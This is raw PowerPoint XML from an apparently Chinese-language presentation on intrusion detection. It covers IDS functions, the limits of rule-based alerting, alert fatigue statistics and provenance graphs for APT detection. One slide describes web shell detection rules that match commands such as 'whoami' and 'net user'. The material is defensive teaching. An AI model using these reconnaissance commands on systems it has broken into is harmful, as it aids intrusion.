          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="9079"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统计、分析攻击者的探测行为，发出警报</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14" name="组合 13"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>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1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1</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="组合 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4060190" y="2743835"/>
            <a:ext cx="7280910" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="11466" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20"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检测、记录网络中的攻击行为，采取阻断措施</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1" name="组合 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="150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2</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="组合 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4084320" y="3282315"/>
            <a:ext cx="7280910" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="11466" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="10147"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提供攻击的详细信息，诊断和修补安全弱点</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8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>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2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3</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="组合 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4097020" y="3820795"/>
            <a:ext cx="5558155" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="8753" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="7434"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检测未授权操作或安全违规行为</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31" name="组合 30"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>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33"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4</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="组合 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4109720" y="4370705"/>
            <a:ext cx="5826125" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="9175" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="7856" cy="1140"/>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kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>识别、报告系统中存在的安全威胁</a:t>
              </a:r>
              <a:endParaRPr lang="zh-C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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36" name="组合 35"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>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 y="3854"/>
                <a:ext cx="1508" cy="1508"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="98" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9170" y="4221"/>
                <a:ext cx="427" cy="774"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                  <a:prstClr val="black">
                    <a:alpha val="40000"/>
                  </a:prstClr>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr anchor="ctr">
                <a:scene3d>
                  <a:camera prst="orthographicFront"/>
                  <a:lightRig rig="threePt" dir="t"/>
                </a:scene3d>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="l" defTabSz="914400" eaLnBrk="0" latinLnBrk="1" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1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rPr>
                  <a:t>5</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="100" name="图片 99" descr="internet-traffic.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460500" y="2529205"/>
            <a:ext cx="2375535" cy="2566035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{349185F6-5DEF-45BC-9FAA-8C021F044B0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、入侵检测系统概述</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传统方法问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="92710" y="2113915"/>
            <a:ext cx="12032615" cy="93218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b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>缺乏上下文，攻击描述能力有限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a: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n>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>规则描述能力有限，仅能描述分布在单条日志，或者有限长度的日志序列类型的攻击。</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n>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例如右图中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>web shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检测，规则只能匹配一条日志中命令行存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>net user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等命令的攻击</a:t>
            </a:r>
            <a:endParaRPr>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="3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lang="zh-CN" altLang="en-US">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6040120" y="3098165"/>
            <a:ext cx="5975350" cy="3302000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="270510" y="3239135"/>
            <a:ext cx="5131435" cy="3366770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF6535AE-4224-4608-AF1B-7BC79CCF073D}"/>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传统方法问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="92710" y="2113915"/>
            <a:ext cx="12032615" cy="93218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b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>告警疲劳问题</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a: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n>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>由于业务设计不规范或者安全规则宽泛等原因，安全运营人员淹没在海量告警中，无法发现和处理真正的攻击。</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n>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例如，内网应用中存在直接传SQL语句、参数、语句拼接等问题，触发了SQL注入攻击告警规则</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lang="zh-CN" altLang="en-US">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="739140" y="3544570"/>
            <a:ext cx="4986020" cy="3113405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="圆角矩形 26"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7145020" y="3814445"/>
            <a:ext cx="4705985" cy="167322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sz="1800">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>规则检测的告警的精度普遍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1%~3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%之间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>一项针对赛门铁克终端告警的分析表明，由 34台机器触发的 58096 条告警中，与检测目标 APT29 行为相关真实告警只有 1104 条，告警的精度只有1.9%。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473710" y="3082290"/>
            <a:ext cx="5818505" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>行动某国家级大客户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>天告警数据，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>99%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>都是误报</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="标题 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{129B79E1-2CB8-44D0-BF04-0060560F8BE0}"/>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终端数据组织形式</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终端溯源图</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="79692" y="2030730"/>
            <a:ext cx="12032615" cy="93218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b="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>终端</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>溯源图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统监控日志（System audit logs）转化为有向无环的溯源图来记录终端行为，其中节点代表不同类型的系统操作实体（例如，进程，文件和网络），边代表系统事件（例如，进程创建了一个文件）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>其中</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>包含的上下文信息能够更好的刻画APT攻击中的高级攻击特征</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="3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lang="zh-CN" altLang="en-US">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="100" name="图片 99"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5593080" y="3544570"/>
            <a:ext cx="2930525" cy="2434590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="101" name="图片 100"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8886825" y="3343910"/>
            <a:ext cx="2872740" cy="2857500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="下箭头 34"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16380000">
            <a:off x="8648700" y="4814570"/>
            <a:ext cx="179070" cy="252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21" name="图片 20"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
